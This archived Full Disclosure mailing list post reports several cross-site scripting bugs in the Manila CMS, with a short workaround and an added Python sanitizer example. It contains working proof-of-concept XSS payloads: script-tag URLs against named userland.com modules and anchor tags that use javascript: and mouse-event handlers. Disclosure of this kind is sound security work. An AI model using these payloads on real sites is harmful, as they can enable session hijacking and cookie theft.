Full Disclosure mailing list archives

Manila.userland.com XSS'able
From: aaron <aaron () lo-res org>
Date: Sat, 15 Apr 2006 12:04:15 +0200




Manila from manila.userland.com is a widely deployed CMS       _     _
(http://http://manila.userland.com/selectedCustomers)          \`\ /`/
                                                                \ V /
The following cross site scripting exploit was sent to          /. .\
userland.com on the 2nd of April.                              =\ T /=
                                                                 / ^ \
Happy easter-hacking, live from the easterhegg                {}/\\ //\
(http://eh.cngw.org)                                          __\ " " /__
                                                         jgs (____/^\____)


--- snip -- original post to manila-bugs () userland com follows ----

Multiple XSS bugs in manila.
To: manila-bugs () userland com

Authors:
Michael Bauer <mihi () lo-res org>, Aaron Kaplan <aaron () lo-res org>

These bugs will be reported to you and released to the public 10 days after
submission to userland.com, as we strongly believe in full disclosure.

Software:
   manila
Vendor:
   userland.com
Versions tested:
   <meta name="generator" content="UserLand Frontier 9.0.1">

Overview:

Manila is vulnerable to several XSS injections which can be abused
to steal a cookie from a logged in user. This means taking over his session
and doing stuff in his name.


Details:

        In the module "msgReader"
        --------------------------
        proof of concept:
        http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E

        in the module "sendMail":
        --------------------------
        proof of concept:
        http://profiles.userland.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

        in the module "editInBrowser"
        -----------------------------
        explanation:
        it is possible to use <a> and other html tags to put javascript
        instructions into the webpage. Examples:
        <a href=javascript:alert('xss!')>click here</a>
        <a href=# onmouseover="alert('xss!')">click here</a>
        <a href=# onmouseout="alert('xss!')">click here</a>

        demo can be seen on http://mana.manila.at/discuss/msgReader$15?mode=day
        as we got an account there.

Workaround:
htmlescape all user input! If you want to accept html as input,
write your own html parser for a limited html subset.

Disclaimer:

For educational purposes only, we are not responsible for any harm produced
by the security hole we published.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
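
The workaround in the post above, sketched as an added example (not part of the original post and not Manila or Frontier code): reflected parameters such as `mode` and `referer` are escaped before output, and submitted HTML is rebuilt from an allowlist. The tag subset, scheme list and function names are assumptions, and Python's standard-library parser stands in for a hand-written one.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy: tag -> attributes allowed on it. Anything else is dropped.
ALLOWED_TAGS = {"a": {"href"}, "b": set(), "i": set(), "p": set()}
ALLOWED_SCHEMES = {"http", "https", "mailto"}

def escape_param(value):
    """Escape a request parameter before echoing it into text or a quoted attribute."""
    return html.escape(value, quote=True)

def safe_href(url):
    """Accept only allowlisted schemes, or relative links starting with / or #."""
    cleaned = "".join(ch for ch in url if ch > " ")  # browsers ignore tabs/newlines here
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme in ALLOWED_SCHEMES or (not scheme and cleaned.startswith(("/", "#")))

class SubsetSanitizer(HTMLParser):
    """Re-emits only allowlisted tags and attributes; all text is re-escaped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (script, img, ...) is dropped
        kept = []
        for name, value in attrs:  # names arrive lowercased, values entity-decoded
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue  # drops onmouseover, onmouseout, style, ...
            if name == "href" and not safe_href(value):
                continue  # drops javascript: and other unlisted schemes
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize(fragment):
    parser = SubsetSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Escaping covers the `msgReader` and `sendMail` cases, where the parameter is only echoed back; the sanitizer covers the `editInBrowser` case, where some markup has to survive.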

